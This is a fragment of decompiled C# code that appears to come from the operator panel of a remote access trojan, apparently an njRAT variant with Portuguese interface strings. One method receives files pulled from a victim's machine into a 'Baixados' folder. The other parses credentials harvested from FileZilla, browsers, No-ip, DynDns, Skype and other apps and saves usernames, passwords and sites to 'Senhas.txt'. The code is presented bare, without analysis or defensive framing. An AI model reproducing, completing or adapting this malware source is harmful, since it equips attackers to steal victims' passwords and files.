// Token: 0x060000ED RID: 237 RVA: 0x001E0EA0 File Offset: 0x001DF2A0 private void DW_Load(object sender, EventArgs e) { this.Text = Conversions.ToString(RuntimeHelpers.GetObjectValue(Operators.ConcatenateObject(RuntimeHelpers.GetObjectValue(Operators.ConcatenateObject(RuntimeHelpers.GetObjectValue(Class7.smethod_1(this.osk.L)), " - ")), Class6.smethod_16(this.FN)))); this.ProgressBar1.Maximum = this.SZ; this.folder = this.osk.Folder + "Baixados\\"; bool flag = !Directory.Exists(this.folder); if (flag) { Directory.CreateDirectory(this.folder); } this.folder += new FileInfo(Class6.smethod_16(this.FN)).Name; this.Lv1.Items[0].SubItems[0].Text = new FileInfo(Class6.smethod_16(this.FN)).Name; this.Lv1.Items[1].SubItems[0].Text = Class6.smethod_17((long)this.SZ); do { this.tmp = Interaction.Environ("Temporarios") + "\\njfm_" + Class6.smethod_6(10); }while (File.Exists(this.tmp)); this.FS = new FileStream(this.tmp, FileMode.Append); this.Lv1.Items[2].SubItems[0].Text = Class6.smethod_17((long)(this.ProgressBar1.Value - this.os)); this.os = this.ProgressBar1.Value; this.Lv1.Items[3].SubItems[0].Text = Class6.smethod_17((long)this.ProgressBar1.Value); this.Lv1.method_3(); this.Timer1.Enabled = true; }
// Token: 0x060002FE RID: 766 RVA: 0x001F4838 File Offset: 0x001F2C38 public void XD(ref Client c, ref string S) { string[] array = Strings.Split(S, " ", -1, CompareMethod.Binary); int num = -1; bool flag = !Directory.Exists(c.Folder); if (flag) { Directory.CreateDirectory(c.Folder); } string[] array2 = new string[] { "FileZilla", "No-ip", "DynDns", "Paltalk", "FireFox", "Chrome", "MSN", "Yahoo", "Opera", "Internet Explorer", "ooVoo", "DUC v3", "Skype" }; string text = string.Empty; foreach (string text2 in array) { try { flag = (text2.Length > 0); if (flag) { bool flag2 = Operators.CompareString(text2, "*", false) == 0; if (flag2) { num++; } else { flag2 = !text2.Contains(":"); if (flag2) { text2 = Class6.smethod_16(text2); } string[] array4 = Strings.Split(text2, ":", -1, CompareMethod.Binary); flag2 = (array4.Length > 3); if (flag2) { string expression = text2; string find = array4[0] + ":" + array4[1]; string text3 = array4[0] + ":" + array4[1]; array4 = Strings.Split(Strings.Replace(expression, find, Class6.smethod_14(ref text3), 1, -1, CompareMethod.Binary), ":", -1, CompareMethod.Binary); } ListViewItem listViewItem = new ListViewItem(); listViewItem = this.L1.Items.Add(Class6.smethod_16(array4[1]), num); listViewItem.SubItems.Add(Class6.smethod_16(array4[2])); listViewItem.SubItems.Add(Class6.smethod_16(array4[0])); listViewItem.SubItems.Add(array2[num]); NewLateBinding.LateCall(listViewItem.SubItems, null, "Add", new object[] { RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Class7.smethod_1(c.L)))) }, null, null, null, true); text = text + "Usuario : " + listViewItem.Text + "\r\n"; text = text + "Senha : " + listViewItem.SubItems[1].Text + "\r\n"; text = text + "Site : " + listViewItem.SubItems[2].Text + "\r\n\r\n"; } } } catch (Exception ex) { } } try { File.WriteAllText(c.Folder + "Senhas.txt", text); } catch (Exception ex2) { } this.FxCOLM(this.L1); this.ToolStripMenuItem1.Text = "Senhas( X )".Replace("X", Conversions.ToString(this.L1.Items.Count)); }